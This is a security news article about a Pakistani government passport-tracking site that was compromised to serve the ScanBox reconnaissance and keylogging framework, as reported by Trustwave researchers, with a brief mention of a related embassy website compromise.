A Pakistani government site used as a tracking platform for passport applications has been compromised to deliver a ScanBox framework payload which captures the visitors’ machine information and logs their keystrokes.
The breached website is tracking.dgip.gov[.]pk, a sub-domain of the Directorate General of Immigration & Passport of the Pakistani government.
Framework was previously used by APT groups
“It was then seen again in 2017 suspected to be used by the Stone Panda APT group, and once more in 2018 in connection with LuckyMouse. With every appearance, it seems to have evolved in terms of the kinds of information it gathers,” says Trustwave’s SpiderLabs Research team which discovered the intrusion.
The researchers observed that the ScanBox framework version used to compromise this Pakistani passport application tracking platform “also tried to detect whether the visitor has any of a list of 77 endpoint products installed, most of these are security products, with a few decompression and virtualization tools.”
Seeing that the ScanBox reconnaissance tool is usually deployed to collect as much information as possible about a website’s visitors, the compromised website could potentially be used as part of a watering hole attack targeted at a specific group of targets that use it.
Low detection rate for the compromised domain
Even though the attackers used a well-known malicious tool on the compromised website to collect visitor information, scans of the domain using VirusTotal, Zscaler, and Symantec’s URL scanners “show an alarming lack of detection.”
While the researchers initially detected the compromised website on March 2 and there is no way to pinpoint an exact time range for the breach, during the first day they monitored the domain the attackers managed to “collect information on at least 70 unique site visitors, about a third of them with recorded credentials.”
The research team did manage to scan the ScanBox server used to collect and store all the stolen data and got only two detections of malicious content, even though it went offline on March 7, one day after they started digging deeper.
SpiderLabs Research received no response after contacting the website admins to report the breach, however, the domain now was no longer marked as malicious in VirusTotal scans performed by internetnewsblog on March 13.
Despite this, Trustwave’s researchers state that, while the Scanbox server currently appears inactive, “the infection indicates that the attack has some level of access to the site, and so it’s likely that the server could return to activity or be replaced with a different piece of malicious code at the attacker’s will.”
Last month, researchers from Trustwave also disclosed that the website of the Bangladeshi Embassy in Cairo was compromised to distribute malicious Word documents.
The website would automatically download the documents on visitors’ computers, subsequently installing malware downloaders once opened by exploiting the remote code execution EPS (aka Encapsulated PostScript) CVE-2017-0261 vulnerability.